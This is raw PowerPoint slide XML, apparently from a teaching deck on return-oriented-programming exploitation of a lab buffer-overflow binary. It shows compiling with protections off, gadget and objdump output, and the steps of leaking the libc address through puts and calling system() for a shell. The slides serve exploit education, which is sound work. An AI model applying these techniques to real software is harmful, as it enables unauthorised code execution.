            <a:ext cx="1881673" cy="3343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8AC023-C9C1-1323-5DDA-DBC3F190E0CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457560" y="2379302"/>
            <a:ext cx="1951653" cy="3732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016B1D-E659-107E-E17E-D53DA2C79698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457560" y="3825548"/>
            <a:ext cx="2114939" cy="3110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35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ROP Exploitation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pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -O3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-stack-protector -no-pie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="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2A0B4EA-D734-A937-E92A-3B34FBFB6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5" t="15230" r="6710" b="35526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636006" y="3128303"/>
            <a:ext cx="8919960" cy="274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32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ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ROP Exploitation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pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create a ROP chain to hijack control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Leverage ROP Chain to leak the base address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> at the time of execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Do some Math and calculate system() address in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Execute second stage of the payload and obtain shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3684849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ROP Exploitation (cont.)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8838095" cy="4043765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ROPGadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> --binary ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pP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9CFE22-70BD-A6AE-0DDB-6076BAD1ACEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1872462" y="2527777"/>
            <a:ext cx="8434253" cy="34951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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...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0x40126b : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret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0x40126f : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r14 ; pop r15 ; ret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0x401113 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x401273 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x401271 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r15 ; ret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0x40126d : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r13 ; pop r14 ; pop r15 ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x40101a : ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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530046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ROP Exploitation (cont.)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5" cy="741765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pP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9CFE22-70BD-A6AE-0DDB-6076BAD1ACEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295822" y="2499246"/>
            <a:ext cx="9597889" cy="925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FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>00000000004010b0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;main&gt;: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  *0x2ea2(%rip)   # 403ff0 &lt;__libc_start_main@GLIBC_2.2.5&gt;</a:t>
            </a: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AF50C6-DE0E-A6D2-8AC0-BBB057822159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299634" y="3667253"/>
            <a:ext cx="9601195" cy="7417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SzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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9A9547-F578-08F3-F554-893B1A4A1350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295821" y="4561963"/>
            <a:ext cx="9606548" cy="5594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FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0000000000401070 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;: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D43F64-CDA0-0E0A-CC4C-11C817DA1E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294534" y="5113192"/>
            <a:ext cx="9594271" cy="9178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    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bnd</a:t>
            </a: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jmpq</a:t>
            </a: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 *0x2f9d(%rip)        #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2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>404018 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="86724D"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>&lt;puts@GLIBC_2.2.5</a:t>
            </a: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&gt;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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>callq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  401070 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts@plt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237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ROP Exploitation (cont.)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5" cy="741765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buNone/>
            </a:pP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9CFE22-70BD-A6AE-0DDB-6076BAD1ACEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295822" y="2499246"/>
            <a:ext cx="9597889" cy="925667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00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>00000000004010b0 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2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AF50C6-DE0E-A6D2-8AC0-BBB057822159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299634" y="3667253"/>
            <a:ext cx="9601195" cy="7417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14999"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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D3E2B3-59A4-F0FD-4DC9-64B2C83B721B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295821" y="4561963"/>
            <a:ext cx="9606548" cy="5594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FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0000000000401070 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2D60F67-D7D7-E782-E269-CE2114E8D419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294534" y="5113192"/>
            <a:ext cx="9594271" cy="917863"/>
          </a:xfrm>
          <a:prstGeom prst="round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                                                      # </a:t>
            </a:r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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>404018 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30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Leaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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FC8B0D5-8230-2C4A-B547-66BA8B24FA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0511162"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8865472" y="658998"/>
          <a:ext cx="2630109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0x4010b0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98324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0x40101a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96253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0x401070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0x404018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35006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F24F0A9-7619-5EDF-F343-3631E5339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412801"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5342752" y="4707380"/>
          <a:ext cx="3371404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5028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296376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rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x7ffff7faf7e0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rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401273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0A1DC12F-0A8C-BFFC-F9E9-B98EC94ED349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5656683" y="3114091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D7A079-5350-3EF7-82DE-71502ECBEEBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="6905544" cy="297132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puts_glibc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 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0x404018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puts_plts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#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x401070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 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ret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0x40101a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main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0x4010b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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764584-2ACD-CDAE-698F-7CEC5BF35157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157776" y="3884700"/>
            <a:ext cx="2999662" cy="9256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00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>00000000004010b0 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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AC811DD-8D68-5A05-1094-DED3D017E1A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462519" y="3252113"/>
            <a:ext cx="2774526" cy="5421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FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0000000000401070 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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D7C0C66-E9AB-5556-0555-5A60B80642EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1701511" y="2827192"/>
            <a:ext cx="9594271" cy="917863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                                                      # </a:t>
            </a:r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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>404018 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04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Leaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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FC8B0D5-8230-2C4A-B547-66BA8B24FA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5629921"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8865472" y="705650"/>
          <a:ext cx="2630109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0x4010b0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98324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0x40101a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96253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0x401070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0x404018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35006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F24F0A9-7619-5EDF-F343-3631E5339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293727"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5412025" y="4664084"/>
          <a:ext cx="3254495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749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216746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rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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baseline="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0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rdi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x7ffff7faf7e0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rbp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>JUNKJUNK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effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401273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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22F590C-C066-7B6D-789E-E162101F3785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8505175" y="3886792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5CA092-022C-AA71-30C3-38496AEEDA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="6932125" cy="297132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puts_glibc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0x404018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puts_plts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0x401070 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ret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0x40101a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main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0x4010b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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80B7A162-E90A-99BE-AA77-89C99062F120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="799643" y="2627159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26489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Leaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Address (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1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FC8B0D5-8230-2C4A-B547-66BA8B24FA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7828859"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8826595" y="1312140"/>
          <a:ext cx="2630109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0x4010b0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98324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0x40101a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96253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0x401070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  <a:endParaRPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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F24F0A9-7619-5EDF-F343-3631E5339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334810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5753794" y="4652598"/>
          <a:ext cx="2955763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494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013269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rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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baseline="0" noProof="0" dirty="0">
